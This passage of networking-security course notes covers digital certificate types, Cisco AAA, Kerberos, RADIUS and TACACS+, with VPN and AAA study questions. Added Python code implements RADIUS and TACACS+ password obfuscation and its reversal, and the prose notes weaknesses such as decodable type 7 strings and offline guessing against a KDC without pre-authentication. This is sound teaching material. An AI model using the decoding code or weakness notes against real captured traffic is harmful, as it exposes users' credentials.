digital certificate is in many ways the electronic equivalent of a passport or driver's
license, and may be used to identify and authenticate someone making online
transactions. A certification authority issues a digital certificate to a certificate holder
on the request of a registration authority.

Details on a digital certificate include the certificate holder's name, their public key, the
name of the certification authority and an indication of the certificate policy under
which it was issued. Most digital certificates are in the format specified in the X.509
standard.

The public key and private key pair can be generated on a secure device. A
certification authority creates the digital certificate, incorporating the public key, and
signs it, protecting the integrity of the information. The public key in a digital certificate
is linked to the private key. The certificate holder must hold the private key securely.
The security of the private key is extremely important. In many applications a private
key is stored by placing or creating the private key on a physical token such as a
smart card.

Types of digital certificates

There are three different types of digital certificates used by web servers and web
browsers to authenticate over the internet. These digital certificates are used to link
a web server for a domain to the individual or organization that owns the domain –

 Domain Validated (DV SSL) certificates offer the least amount of assurance about the holder
of the certificate. Applicants for DV SSL certificates need only demonstrate that they have the
right to use the domain name. While these certificates can give assurance that data is being sent
and received by the holder of the certificate, they give no guarantees about who that entity is.
 Organization Validated (OV SSL) certificates provide additional assurances about the holder
of the certificate; in addition to confirming that the applicant has the right to use the domain, OV
SSL certificate applicants undergo additional confirmation of their ownership of the domain.
 Extended Validation (EV SSL) certificates are issued only after the applicant is able to prove
their identity to the satisfaction of the CA. The vetting process includes verification of the
existence of the entity applying for the certificate, verifying that its identity matches official records,
verifying that the entity is authorized to use the domain and confirming that the owner of the
domain has authorized the issuance of the certificate.

MCQ
1. What is a Virtual Private Network (VPN)?
2. How does a VPN provide secure communication over a public network?
3. What is the purpose of a site-to-site VPN?
4. What is the difference between remote access VPN and site-to-site VPN?
5. What are the advantages of using VPN for remote access to a network?
6. How does IPsec contribute to VPN security?
7. What is the purpose of using encryption in VPN?
8. What are the different types of VPN protocols commonly used in network environments?
9. What is the purpose of a VPN concentrator?
10. What is the significance of proper VPN configuration and encryption protocols for data
privacy?
11. What is the purpose of a VPN client in establishing a VPN connection?
12. How does tunneling contribute to secure transmission of data in a VPN?
13. What is the purpose of a VPN profile?
14. What is the role of SSL/TLS in VPN security?
15. What are the potential challenges of implementing VPN in a large-scale network?
16. What is the purpose of split tunneling in VPN?
17. What are the advantages of using VPN over traditional dedicated leased lines for network
connectivity?
18. What is the purpose of a VPN gateway in establishing VPN connections?
19. What is the potential impact of misconfigured VPN settings on network connectivity?
20. What is the purpose of using multi-factor authentication in VPN?
21. What is the role of VPN concentrators in handling multiple VPN connections simultaneously?
22. What are the potential security risks and vulnerabilities associated with VPN
implementations?
23. What is the purpose of implementing two-factor authentication in VPN?
24. What is the significance of VPN monitoring and logging in network security?
25. What are the potential security risks associated with VPN protocols that use weak encryption
algorithms?
26. What is the purpose of implementing network segmentation in VPN environments?
27. What is the role of VPN encryption in ensuring data privacy during transmission?
28. What are the potential security risks associated with using outdated VPN protocols?

SAQ

1. What does VPN stand for in the context of networking?


2. Explain the concept of a Virtual Private Network (VPN) and its purpose.
3. How does a VPN provide secure communication over a public network?
4. Configure a site-to-site VPN tunnel between two Cisco routers.
5. Discuss the differences between remote access VPN and site-to-site VPN.
6. Evaluate the advantages and disadvantages of using VPN for remote access to a network.
7. Design a VPN solution that utilizes both IPsec and SSL/TLS protocols.
8. What are the primary components of a VPN architecture?
9. What is the role of a VPN client in establishing a VPN connection?
10. How does tunneling ensure secure transmission of data in a VPN?
11. Configure a VPN concentrator to allow remote access VPN connections.
12. Explain the process of VPN tunnel establishment and key exchange protocols.
13. Assess the significance of proper VPN configuration and encryption protocols for data privacy.
14. Create a VPN configuration that allows split tunneling for specific traffic.
15. What are the types of VPN protocols commonly used in network environments?
16. What is the difference between a VPN concentrator and a VPN endpoint?
17. How does VPN encryption protect data transmitted over the internet?
18. Configure a VPN client to connect to a remote VPN server using the OpenVPN protocol.
19. Discuss the potential challenges and considerations of implementing VPN in a large-scale
network.
20. Evaluate the impact of VPN on network performance and bandwidth utilization.
21. Design a VPN configuration that utilizes two-factor authentication for client connections.
22. What are the advantages of using VPN over traditional dedicated leased lines for network
connectivity?
23. What is the purpose of VPN tunnel encapsulation?
24. How does VPN handle routing and addressing between remote networks?
25. Configure a VPN profile on a mobile device for secure access to a corporate network.
26. Explain the role of VPN concentrators in handling multiple VPN connections simultaneously.
27. Assess the security risks and vulnerabilities associated with VPN implementations.
28. Create a VPN configuration that allows network traffic to traverse NAT devices.
29. What are the considerations for choosing the appropriate VPN encryption algorithm?
30. What is the purpose of a VPN gateway in establishing VPN connections?

IMPLEMENT AAA ON CISCO ROUTERS


CLASS NOTES

The term authentication, authorization, and accounting (AAA) refers to a variety
of common security features. This section focuses on the first "A" in AAA—
authentication—and how it is used to manage access to a router or IOS switch's
user mode and privileged mode.

Authentication: Identifies and verifies the remote user. This process can take the form of a
simple password or user name/password combination verified locally by the
NAS, or it could use one or more authentication servers and technologies, such
as one-time passwords (OTPs) or tokens.

Authorization: Determines what devices, features, or services a specific remote user is
authorized to access in the network, such as network resources or services. This
concept is much like that of user permissions in the Windows server model.

Accounting: Allows the network administrator to define a process for tracking the services
remote users are accessing. The data collected can be used for client billing,
auditing, or network planning.

Why Authenticate?
Not too long ago, PCs didn’t require a user to type in their user name and/or a
password. The computer powered up, and whoever was sitting at the keyboard had
full access to anything stored on the machine. Even many networked computers
were configured without a login requirement because, after all, “everybody was just
like family.” This would be the ultimate “open” system.
It didn’t take long to determine that possibly everyone in the family doesn’t need to
see the checkbook program or read each other’s e-mails, but, to protect those
resources, it was necessary to know who was sitting at the keyboard. Some
applications experimented with using passwords, and people learned to use
password protection on shared resources like folders or printers. Once a password
was created, it had to be shared with anyone who needed access. If more than one
shared resource existed, one of two problems arose. Either unique passwords were
necessary for each resource, requiring some users to keep track of multiple
passwords and the resource they were associated with, or the same password was
used, which meant any user who had legitimate access to one protected resource
now had the password for all protected resources.
If someone left under less-than-favorable circumstances, all passwords known to
that person had to be changed, and then the other users had to be told about the
changes. These early efforts showed right away that leaving security up to the
individual users wasn’t reliable and wouldn’t scale well as the network grew.
Many organizations have this same problem with the user names and/or passwords
used to access their network devices, such as routers and switches, by storing the
access user name and/or password locally on the device. The following output
demonstrates access requiring only a password (line con 0 and line aux 0) and
access using the local database (line vty 0 4).

The preceding techniques were covered in Chapter 2. While both methods work, they
have the same shortfalls and security issues as the early networking administrators faced
with user data and applications. The example could be made more secure by using
techniques covered in Chapter 2, including the following:
 Using a different password for each access point
 Using complex passwords of eight or more characters, mixing uppercase and
lowercase letters, numbers, and symbols
 Requiring routine password changes
 Using the service password-encryption command to hide the
passwords from wandering eyes that could see the configuration
The encryption also reduces the chances of someone capturing the passwords if the
configuration is displayed over a Telnet session, because Telnet transmits all
communications in cleartext. Two caveats apply. First, service password-encryption
produces reversible "type 7" strings that are trivially decoded, so it only defeats
shoulder-surfing; for the enable password and local accounts use enable secret and
username ... secret, which store a one-way hash instead. Second, for remote
management use SSH (transport input ssh) rather than Telnet, so the session itself
is not readable on the wire.

Centralized Authentication

The scalability and reliability limitations of locally stored authentication can
only be overcome by using some form of centralized authentication server. Network
operating systems (OSs) typically have this feature at their core. In addition to
allowing access to the network, such a system is usually linked to a mechanism for
matching login IDs with permissions to use protected resources. While all
authenticated users might have permission to use any of the network printers, only
members of the "accounting" group might be granted permission to access the
Accounting Department servers, and maybe only those accounting group members who
are also in the "payroll" group might be granted access to the payroll software
and data.
If a payroll accountant leaves the company under any circumstances, it's only
necessary to disable or delete their user account, which also removes them from the
accounting and payroll groups, maintaining security for those assets.
AAA is a technology that can work independently or with the network security system
to provide centralized authentication, authorization, and accounting for network
devices and remote user access. Figure 3-3 demonstrates a simple example of AAA and
a NAS (network access server) providing secure access to a company network. With only
authentication in place, the remote user could reach both the server (a web server,
possibly) and the company network. With authorization implemented, the modem user
could be allowed access to both, while the ISDN user is limited to one or the other.

AAA Benefits
Cisco's AAA technology centralizes network access security and provides many
benefits to the organization and network administrator, including the following:
 Increased flexibility
 Increased security
 Scalability
 Standard authentication methods
 Multiple backup systems

Increased Flexibility
AAA’s support of authorization, in addition to authentication, means access can be
maintained on a “need to have” basis, without having to maintain multiple passwords.
The accounting support means that user auditing and cost-allocation policies can be
implemented, as well as providing a trail that might be useful in troubleshooting
network problems.
Increased Security
Multiple devices with the same locally administered user name/password offer a low
level of security. Everyone having access to everything, without regard for need,
also unnecessarily increases risk. Multiple locally administered passwords would
appear to increase security, but might lead to employees writing down passwords if
too many exist to remember. This situation would be exacerbated if complex
passwords were implemented.
AAA, with its centralized security database and authorization features, allows a
single secure user name/password combination for each employee and yet allows
restricting access to a “need to have” basis. At the same time, AAA allows for rapid
resolution of compromised passwords or terminated employees.
Scalability
AAA is a template approach to security management that remains reliable and
flexible as the network grows larger and more complex. By centralizing the security
databases and supporting authorization, AAA avoids the nightmare of managing
many user name/password combinations in a growing environment or the alternative
“weak” security of using a small number of combinations. Locally stored
authentication means any time there’s a potential of a compromised user
name/password or termination of an employee, each device “should” be
reconfigured. The more devices that exist, the greater the amount of effort. AAA
avoids this in much the same way that server security is maintained under the same
circumstances.
Standard Authentication Methods
AAA supports the RADIUS, TACACS+, and Kerberos security protocols for securing
dial-in sessions. These protocols provide authentication against a central database
and interaction with network server security systems, although how much of the
exchange each one protects on the wire differs (see Packet Encryption, below). The
next section compares the three.
Multiple Backup Systems
AAA supports multiple security servers, such as TACACS+, on the same network to
provide redundancy in case of device failure or link congestion. In addition, AAA
allows multiple authentication methods to be specified in a method list so that, if
the first one is unavailable, a second or third option can be used. For example, if
the specified TACACS+ server is offline, the locally stored user name/password
database could be used, or perhaps even the enable password. These alternatives
must be defined in advance or access could be blocked until the specified service
is restored. Note that IOS moves to the next method only when the current one
returns an error (for example, no server responds); an explicit reject from a
reachable server ends the attempt without consulting later methods.
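The following simulation is an added example, not code from the page or from Cisco: it walks a method list like `aaa authentication login default group tacacs+ local enable` and applies the rule just described, that the next method is consulted only on an error, never on an explicit reject. The credential stores, user names and the way each toy method classifies an unknown user are constructed for the simulation and are not IOS behaviour.

```python
"""Added example (not from the page): how an IOS AAA method list falls through.

Models a list such as   aaa authentication login default group tacacs+ local enable
in which each method answers PASS, FAIL or ERROR.  The rule shown is IOS's
documented one: the next method is consulted only when the current one returns
an ERROR (no usable answer, e.g. the server did not respond); an explicit FAIL
from a reachable server ends the attempt.  When every configured method errors
and nothing remains, the login is locked out.  The credential stores, user names
and the ERROR/FAIL classification of the toy methods are constructed here.
"""
from enum import Enum
from typing import Callable, List, Tuple


class Verdict(Enum):
    PASS = "pass"      # credentials accepted
    FAIL = "fail"      # credentials rejected: stop here
    ERROR = "error"    # method could not answer: try the next one


# Constructed credential stores for the simulation.
TACACS_USERS = {"alice": "Tacacs-Pw-1!"}
LOCAL_USERS = {"emergency": "Br3akGlass!"}
ENABLE_SECRET = "En4ble-Secret!"

Method = Callable[[str, str], Verdict]


def tacacs_method(server_reachable: bool) -> Method:
    """Remote server: ERROR when unreachable, otherwise PASS/FAIL on the credentials."""
    def method(user: str, password: str) -> Verdict:
        if not server_reachable:
            return Verdict.ERROR
        return Verdict.PASS if TACACS_USERS.get(user) == password else Verdict.FAIL
    return method


def local_method(user: str, password: str) -> Verdict:
    """Local username database (modelling choice: an unknown user is an ERROR)."""
    if user not in LOCAL_USERS:
        return Verdict.ERROR
    return Verdict.PASS if LOCAL_USERS[user] == password else Verdict.FAIL


def enable_method(user: str, password: str) -> Verdict:
    """Enable secret: the user name is ignored, only the password counts."""
    return Verdict.PASS if password == ENABLE_SECRET else Verdict.FAIL


def run_method_list(methods: List[Tuple[str, Method]], user: str, password: str) -> Tuple[str, List[str]]:
    """Walk the list in order; return ('accept'|'reject'|'locked-out', trail of verdicts)."""
    trail: List[str] = []
    for name, method in methods:
        verdict = method(user, password)
        trail.append(f"{name}:{verdict.value}")
        if verdict is Verdict.PASS:
            return "accept", trail
        if verdict is Verdict.FAIL:
            return "reject", trail      # no fall-through on an explicit reject
    return "locked-out", trail          # every method errored; nothing left to ask


def demo() -> dict:
    """Four scenarios a practitioner should check before trusting a method list."""
    up = [("tacacs+", tacacs_method(True)), ("local", local_method), ("enable", enable_method)]
    down = [("tacacs+", tacacs_method(False)), ("local", local_method), ("enable", enable_method)]
    only_tacacs_down = [("tacacs+", tacacs_method(False))]
    return {
        "server up, good password": run_method_list(up, "alice", "Tacacs-Pw-1!"),
        "server up, bad password": run_method_list(up, "alice", "wrong"),
        "server down, break-glass account": run_method_list(down, "emergency", "Br3akGlass!"),
        "server down, no fallback configured": run_method_list(only_tacacs_down, "alice", "Tacacs-Pw-1!"),
    }


if __name__ == "__main__":
    for scenario, (outcome, trail) in demo().items():
        print(f"{scenario:38s} -> {outcome:10s} {' > '.join(trail)}")
```

The last scenario is the lock-out the N.B. below warns about: a list with only `group tacacs+` and an unreachable server leaves no method to answer. The second scenario is the one people get wrong in the other direction: a wrong password against a reachable server is a reject, and the local database is never asked.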
TACACS+, RADIUS, and Kerberos Support


AAA supports all three of these security protocols to control dial-up access into
networks. You look, in turn, at each, but note that Cisco supports Kerberos as a
legacy security protocol for those networks already committed to it. Cisco Secure
Access Control Server (ACS), covered in the next chapter, only implements
TACACS+ and RADIUS databases.
At the most obvious level, each of these three protocols does the same thing. Each
provides a secure authentication process that allows remote users to access an
organization’s network resources. At the nuts and bolts level, these are quite different
systems, requiring several chapters to detail. The good news is this: that detailed
information exists in many places, including Cisco’s web site, which is where it’s
going to stay. This chapter covers those features and differences that might be on
the certification exams and would allow a person to choose among them for
implementation, or at least to move ahead with intelligent research.
Kerberos is covered first, and then TACACS+ and RADIUS are compared to help
determine which should be implemented as part of Cisco Secure ACS.
N.B.: It's important to make sure that the TACACS+, RADIUS, or Kerberos server
services are properly configured before adding the client features to the NAS.
Otherwise, you could lock yourself out and require a password recovery.

Kerberos

Kerberos derives its name from the three-headed dog that guards the gates of
Hades in Greek mythology. Kerberos, the security protocol, is an authentication
system developed at the Massachusetts Institute of Technology (MIT). The version
described here used the Data Encryption Standard (DES) cryptographic algorithm for
encryption and authentication; DES encryption types have since been deprecated for
Kerberos (RFC 6649) and current deployments use AES. Kerberos is based on the
assumption that internal users are no more inherently trustworthy than external
users and, therefore, applies authentication and encrypted communications to
services like Telnet for all users.
Kerberos is designed to let two parties exchange private information across an
otherwise open network, like the Internet, by issuing a time-limited credential,
called a ticket, to each user who logs on to the network. The ticket is then
presented with later requests to prove who the sender is. Kerberos is based on the
concept of a trusted third party, the key distribution center (KDC), which contains
the Kerberos authentication server (AS) and performs secure verification of all
users and services on the network. This verification involves exchanging encrypted
authentication messages without ever transmitting the user's password.
The "lite" explanation of using Kerberos to gain network access might help.
1. A remote user opens a PPP connection to an organization's NAS router.
2. The router prompts the user for a user name and a password.
3. The router sends only the user name to the key distribution center (KDC) and
requests a ticket-granting ticket (TGT), the credential that will vouch for the
user's identity.
4. Assuming the user name is known to the KDC, the KDC returns the TGT together with
a session key. The session key is encrypted with a key derived from the user's
password, while the TGT itself is sealed under the KDC's own key and includes
(among other things) the user's identity. The TGT has a limited lifetime (eight
hours, per Cisco's documentation) to reduce the exposure to capture and replay.
5. The router uses the password from Step 2 to derive the user's key and decrypt
the session key. If the decryption succeeds, the password was correct: the remote
user is authenticated to the router and granted access to the network.
Because Step 3 needs only the user name, a KDC that does not require
pre-authentication will hand the password-encrypted reply to anyone who asks for
it, which allows offline guessing of that user's password. Modern Kerberos
deployments require pre-authentication for this reason.
When a remote user successfully authenticates at a boundary router, the user and
the user’s machine become part of the network. Another TGT from the KDC is
necessary to access network services because the original TGT is stored on the
router and isn’t used for additional authentication, unless the user physically logs on
to that router.
Securing a network service involves two layers of encryption. When a user requests
access to a network service, such as a printer or Telnet access to a host, the KDC
creates a service credential (a service ticket). This credential contains the
client's identity, the desired network service's identity, and a time limit. It is
encrypted with a key shared by the KDC and the service, so only that service can
open it. The KDC's reply to the user is in turn protected with the session key the
user obtained along with the TGT, so only the legitimate TGT holder can extract the
ticket.
The user presents the service ticket to the target service, which decrypts it with
its own shared key. If that succeeds, and the identity and time limit inside are
valid, the service is made available.
Since Cisco IOS 11.2, organizations already using Kerberos 5 security can use their
existing authentication servers to authenticate their routers and switches. The IOS
software Kerberos authentication capabilities support the following network services:
 Telnet
 rlogin
 rsh
 rcp
The preceding applications are said to be Kerberized: applications and services
that have been modified to support the Kerberos credential infrastructure and
encrypted communications.
Driver’s License Analogy
An analogy commonly used for Kerberos is a state driver’s license, wherein the state
is the KDC that issues a TGT, the license. The license contains information that
can authenticate the user: the picture and description items. In addition, the
permissions, such as motorcycle endorsement, and restrictions, such as glasses
required, associated with the license are also included. Like a TGT, the license also
has an expiration time after which it’s no longer valid.
Some states include an authentication code made up of portions of the key supplied
data, such as name and birth date. Any crude attempt to alter part of the key data
makes the authentication code not match.
To complete the analogy, a third party accepts the license (the TGT) and, after
confirming the picture and description, trusts that the state did a reasonable job
of confirming identity before issuing the license, and so accepts it as proof of
identity, age, or the right to drive.
RADIUS

Remote Authentication Dial-In User Service (RADIUS) is an access server
authentication, authorization, and accounting protocol originally developed by
Livingston Enterprises, Inc. (later part of Lucent Technologies). RADIUS is a system
of distributed security that secures remote access to networks and network services
against unauthorized access.
RADIUS is a fully open protocol, distributed in source code format, that can be
modified to work with any security system currently available on the market.
Numerous implementations of RADIUS server code are commercially and freely
available. Cisco's servers include CiscoSecure ACS for Windows, CiscoSecure
UNIX, and Cisco Access Registrar. The protocol is defined by IETF RFCs, principally
RFC 2865 (authentication and authorization) and RFC 2866 (accounting).
A RADIUS implementation is made up of the following three components:
 Protocol using UDP/IP communication (UDP port 1812 for authentication and 1813
for accounting; older deployments use 1645 and 1646).
 RADIUS server: a service running on a central Windows or UNIX server, typically
at the customer's site.
 RADIUS client: a service residing in the dial-up access servers, which can be
distributed throughout the network. Cisco added RADIUS client support beginning
with IOS v11.1.
Client/Server Model
A NAS router running the RADIUS client service passes user information to defined
RADIUS server(s), and then acts, based on the response received. The RADIUS
server responds to all user connection requests, authenticating the user, and then
forwarding all configuration information needed for the client to provide the service to
the user. RADIUS servers can act as proxy clients for other types of authentication
servers. The RADIUS server, after reviewing the credentials, replies to the client with
one of the following responses:
 Accept The user is authenticated (Access-Accept).
 Reject The user is not authenticated and access is denied (Access-Reject). The
user will be prompted to reenter the user name/password.
 Challenge A request for more information from the user to confirm identity
(Access-Challenge).
 Change Password The user must change their password. This is a server-side
behavior layered on the three packet types above; the base protocol defines only
Access-Accept, Access-Reject, and Access-Challenge.
Network Security Technology
RADIUS clients and servers use a shared secret for all authentication transactions.
The shared secret itself is never sent over the network; it is mixed into an
MD5-derived keystream that masks the user's password between the client and the
RADIUS server, so that someone snooping an unsecured network does not see the
password in the clear. Only the password is protected this way; the rest of the
packet is not.
Flexibility
A RADIUS server supports a variety of methods to authenticate a user, including
PPP PAP or CHAP, MS-CHAP, UNIX login, and others.
Interoperability
The other side of any open standard is that it doesn't guarantee interoperability
with other vendors' implementations. RADIUS implementations can vary between
vendors because the standard specifically allows vendors to offer custom features
or attributes, carried as attribute-value (AV) pairs. If a device doesn't recognize
an AV pair, it ignores it. To demonstrate the variations, the IETF specification
defines one base set of attributes, while Ascend supports 254. Cisco currently
supports 58 attributes on Cisco Secure ACS, access servers, Ethernet switches, PIX
firewalls, and VPN 3000 concentrators.
TACACS+
Terminal Access Controller Access Control System Plus (TACACS+) is an
authentication protocol that allows a NAS to communicate with an authentication
server to determine whether a user has access to the network.
TACACS+, developed by Cisco, replaces two earlier protocols: TACACS and XTACACS
(Extended Terminal Access Controller Access Control System). TACACS+ isn't
compatible with either of them. Cisco originally submitted the TACACS+ protocol
specification to the IETF as a draft RFC; it has since been published as RFC 8907
(Informational), which is the reference for anyone developing their own TACACS+
software.
TACACS+ server services are maintained in a database on a TACACS+ daemon
running on a Windows 2000/NT or UNIX host. Cisco's servers supporting TACACS+
include CiscoSecure ACS for Windows, CiscoSecure UNIX, and Cisco Access
Registrar. Cisco Secure ACS can implement both TACACS+ and RADIUS. The underlying
architecture of the TACACS+ protocol complements the AAA architecture.
TACACS+ and RADIUS Compared

This section compares several key features of TACACS+ and RADIUS to help
understand the strengths and weaknesses of each. While counterpointing many of
these comparisons is possible and the information is useful, remember, in the long
run, it’s Cisco’s certification and their comparison.
Authentication and Authorization
RADIUS combines the authentication and authorization services. The access-accept
packets sent by the RADIUS server in cleartext to the client contain authorization
information. Accounting is a separate service on the RADIUS server.
TACACS+ fully supports the AAA architecture by separating the authentication,
authorization, and accounting. This allows the flexibility of using another service,
such as Kerberos, for authentication, while still using TACACS+ for authorization
and/or accounting.
UDP vs. TCP
TACACS+ uses TCP for connection-oriented transport between clients and servers;
TCP port 49 is reserved for TACACS+. RADIUS uses UDP (port 1812 for authentication
and 1813 for accounting, or the legacy 1645/1646) for best-effort delivery, which
requires additional variables such as retransmit attempts and time-outs to be
defined to compensate.
The acknowledgements (TCP ACK) provide indications that a request has been
received within (approximately) a network round-trip time (RTT). This same TCP
process uses RST (reset) packets to provide immediate indication of a failed (or
offline) authentication server. UDP can’t tell the difference between a failed server, a
slow server, and a nonexistent server.
TCP keepalive packets can be used to watch for failed servers and to facilitate rapid
failover between multiple connected authentication servers.
TCP scales better and adapts better to growing and/or congested networks.
Challenge/Response
RADIUS supports only unidirectional challenge/response from the RADIUS server
to the RADIUS client. TACACS+ supports bidirectional challenge/response like
CHAP between the two NASs.
Multiprotocol Support
Both TACACS+ and RADIUS support SLIP and PPP encapsulation protocols,
but RADIUS doesn’t support the following TACACS+ supported protocols:
 Novell Asynchronous Services Interface (NASI)
 X.25 PAD connection
 Net BIOS Frame Protocol Control protocol
 AppleTalk Remote Access protocol (ARAP)
Packet Encryption
RADIUS hides only the User-Password attribute in the Access-Request from the client
to the server. The password is XORed with an MD5-derived keystream built from the
shared secret and the request authenticator; this is keystream obfuscation, not a
hash of the password. The remainder of the packet is in cleartext, exposing
information such as the user name, authorized services, and accounting data to
anyone able to snoop the path.
TACACS+ obfuscates the entire body of the packet, leaving only the standard
12-byte TACACS+ header in cleartext. Leaving the body unencrypted is possible for
debugging purposes, but normal operation covers the whole body. A flag in the
header indicates whether the body is encrypted. RFC 8907 describes this MD5-based
scheme as obfuscation rather than encryption and recommends confining TACACS+ to a
protected management network or a secure transport where confidentiality matters.
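The two schemes above are short enough to implement, which makes the difference concrete. The block below is an added example, not code from the page or from any RADIUS or TACACS+ product: it implements the RFC 2865 User-Password hiding and the RFC 8907 body obfuscation, builds one Access-Request attribute set and one TACACS+ packet, and reports what is still readable in each. It also illustrates the shared-secret point made under Network Security Technology. The shared secret, request authenticator, session id and credentials are constructed values, and nothing is sent on a network.

```python
"""Added example (not code from the page): what RADIUS and TACACS+ hide on the wire.

RADIUS (RFC 2865 section 5.2) protects only the User-Password attribute: the
password is null-padded to 16-byte blocks and XORed with an MD5 keystream,
  b1 = MD5(secret || RequestAuthenticator), c1 = p1 XOR b1,
  b2 = MD5(secret || c1),                  c2 = p2 XOR b2, ...
User-Name and every other attribute travel in clear text.

TACACS+ (RFC 8907 section 4.5) XORs the whole body with an MD5 keystream,
  pad1 = MD5(session_id || key || version || seq_no),
  padN = MD5(session_id || key || version || seq_no || pad(N-1)),
leaving only the 12-byte header readable; flag bit 0 set means the body is in clear.

Both schemes are their own inverse.  Secret, authenticator, session id and
credentials below are constructed values; nothing is sent on a network.
"""
import hashlib
import struct


def radius_password_xor(data: bytes, secret: bytes, request_auth: bytes, hiding: bool) -> bytes:
    """Run the User-Password keystream over `data`, chaining on ciphertext blocks."""
    if len(request_auth) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    if hiding:                                   # pad plaintext to 16-byte blocks (empty -> one block)
        data += b"\x00" * (16 if not data else (-len(data)) % 16)
    out, prev = bytearray(), request_auth
    for i in range(0, len(data), 16):
        block = data[i:i + 16]
        xored = bytes(a ^ b for a, b in zip(block, hashlib.md5(secret + prev).digest()))
        out += xored
        prev = xored if hiding else block        # next keystream block depends on the ciphertext
    return bytes(out)


def radius_hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    return radius_password_xor(password, secret, request_auth, hiding=True)


def radius_reveal_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    return radius_password_xor(hidden, secret, request_auth, hiding=False).rstrip(b"\x00")


def radius_attr(attr_type: int, value: bytes) -> bytes:
    """One RADIUS attribute: Type, Length (includes these two bytes), Value."""
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def radius_access_request_attrs(user: bytes, password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Attribute section of an Access-Request: User-Name (1) in clear, User-Password (2) hidden."""
    return radius_attr(1, user) + radius_attr(2, radius_hide_password(password, secret, request_auth))


TAC_PLUS_UNENCRYPTED_FLAG = 0x01
TAC_PLUS_VERSION = 0xC0                          # major version 0xc, minor version 0


def tacacs_body_xor(body: bytes, key: bytes, session_id: int, version: int, seq_no: int) -> bytes:
    """RFC 8907 pseudo-pad, truncated to the body length and XORed over it."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    stream, pad = bytearray(), b""
    while len(stream) < len(body):
        pad = hashlib.md5(prefix + pad).digest()
        stream += pad
    return bytes(a ^ b for a, b in zip(body, stream))


def tacacs_packet(body: bytes, key: bytes, session_id: int, seq_no: int,
                  pkt_type: int = 1, obfuscate: bool = True) -> bytes:
    """Clear 12-byte header (version, type, seq_no, flags, session_id, length) plus the body."""
    flags = 0 if obfuscate else TAC_PLUS_UNENCRYPTED_FLAG
    wire = tacacs_body_xor(body, key, session_id, TAC_PLUS_VERSION, seq_no) if obfuscate else body
    return struct.pack("!BBBBII", TAC_PLUS_VERSION, pkt_type, seq_no, flags, session_id, len(body)) + wire


def tacacs_unpack(packet: bytes, key: bytes) -> bytes:
    """Read the clear header, then undo the XOR using the same session parameters."""
    version, _ptype, seq_no, flags, session_id, length = struct.unpack("!BBBBII", packet[:12])
    body = packet[12:12 + length]
    return body if flags & TAC_PLUS_UNENCRYPTED_FLAG else tacacs_body_xor(body, key, session_id, version, seq_no)


def demo() -> dict:
    """Build one RADIUS attribute set and one TACACS+ packet and report what stays visible."""
    secret = b"shared-secret-1"                  # constructed shared secret
    request_auth = bytes(range(16))              # constructed; a real NAS sends 16 random bytes
    user, password = b"alice", b"Tacacs-Pw-1!"
    attrs = radius_access_request_attrs(user, password, secret, request_auth)
    body = b"user=" + user + b";pass=" + password  # constructed filler, not a real START packet body
    wire = tacacs_packet(body, secret, session_id=0x1234ABCD, seq_no=1)
    return {
        "radius_user_visible": user in attrs,
        "radius_password_visible": password in attrs,
        "tacacs_user_visible": user in wire,
        "tacacs_header": wire[:12],
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Two things worth noticing when running it: the RADIUS keystream is only as unpredictable as the request authenticator, so a NAS that reuses authenticators leaks the XOR of two passwords; and in both protocols anyone holding the shared secret and a capture can recover the credentials, which is why the secret deserves the same handling as a password.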
Router Management
RADIUS doesn’t support limiting the user access to specific router commands
as a tool for router management or terminal services.
TACACS+ supports two methods for controlling the authorization of router
commands, on either a per-user or a per-group basis:
 Assign commands to privilege levels and have the router use TACACS+ to verify
that the user is authorized at the specified privilege level.
 Explicitly define the commands allowed on a per-user or a per-group basis on
the TACACS+ server.
MCQ
1. What does AAA stand for in the context of network authentication?
2. What is the purpose of AAA authentication in network security?
3. Which layer of the OSI model does AAA authentication operate at?
4. What are the three components of AAA authentication?
5. What is the purpose of the authentication server in AAA authentication?
6. How does AAA authentication handle user authentication requests from network devices?
7. Which command is used to configure AAA authentication on a Cisco router?
8. What is the difference between AAA authentication and local authentication on network
devices?
9. What is the purpose of AAA authorization in network security?
10. Which statement accurately describes AAA accounting?
11. What is the purpose of the accounting server in AAA authentication?
12. Which type of information can be collected through AAA accounting?
13. What is the difference between AAA authentication and AAA authorization?
14. What is the purpose of AAA accounting in network security?
15. What is a common protocol used for AAA authentication and accounting?
16. Which statement accurately describes the role of AAA authentication in network security?
17. What is the difference between RADIUS and TACACS+ in AAA authentication?
18. What is the purpose of AAA accounting in network security?
19. What is the difference between AAA accounting and AAA authorization?
20. Which statement accurately describes the purpose of AAA accounting?
21. What is the purpose of the authorization server in AAA authentication?
22. What is the difference between RADIUS and TACACS+ in AAA authentication?
23. What is the purpose of AAA accounting in network security?
24. Which statement accurately describes the role of AAA authentication in network security?
25. What is the difference between RADIUS and TACACS+ in AAA authentication?
26. What is the purpose of AAA accounting in network security?
27. What is the difference between AAA accounting and AAA authorization?
28. Which statement accurately describes the purpose of AAA accounting?
SAQ
1. What does AAA stand for in the context of network authentication?
2. Explain the concept of AAA authentication and its role in network security.
3. How does AAA authentication differ from local authentication on network devices?
4. Configure AAA authentication on a Cisco router to use a remote RADIUS server for user
authentication.
5. Discuss the benefits of using AAA authentication for centralized user management and
access control.
6. Evaluate the advantages and disadvantages of using AAA authentication compared to
other authentication methods.
7. Design a AAA authentication configuration that utilizes both local and remote
authentication methods.
8. What are the three components of AAA authentication?
9. What is the purpose of the authentication server in AAA authentication?
10. How does AAA authentication handle user authentication requests from network devices?
11. Configure a Cisco switch to use TACACS+ authentication for administrative access.
12. Explain the process of AAA authentication when multiple authentication methods are
configured.
13. Assess the significance of proper AAA authentication configuration for network security
and access control.
14. Create a AAA authentication configuration that allows users to authenticate using both
local accounts and Active Directory credentials.
15. What are the primary differences between RADIUS and TACACS+ in AAA authentication?
16. What is the purpose of the authorization server in AAA authentication?
17. How does AAA authentication provide granular access control based on user roles and
privileges?
18. Configure AAA authentication to require multi-factor authentication for specific user
accounts.
19. Discuss the potential impact of a misconfigured AAA authentication configuration on
network access.
20. Evaluate the scalability and performance considerations of using AAA authentication in
large network environments.
21. Design a AAA authentication configuration that utilizes certificate-based authentication for
wireless network access.
22. What is the purpose of the accounting server in AAA authentication?
23. What types of information can be collected through AAA accounting?
